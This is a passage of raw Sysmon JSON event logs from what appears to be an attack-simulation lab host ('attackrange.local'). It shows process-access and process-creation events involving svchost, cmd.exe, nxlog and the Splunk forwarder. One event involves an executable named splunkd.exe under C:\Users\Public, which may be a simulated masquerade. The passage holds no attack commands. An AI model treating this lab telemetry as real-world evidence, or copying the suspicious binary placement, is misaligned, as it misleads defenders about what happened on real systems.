06:51:51.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3943,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3944,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3945,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3946,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3947,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.326\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00109A5A0500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.326","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00109A5A0500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3948,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.419\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.419","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3949,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.437\r\nProcessGuid: {E2A3D6B1-1107-5F25-0000-001013BA0500}\r\nProcessId: 2520\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinPrintMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.437","ProcessGuid":"{E2A3D6B1-1107-5F25-0000-001013BA0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinPrintMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3950,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.435\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001013BA0500}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.435","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program 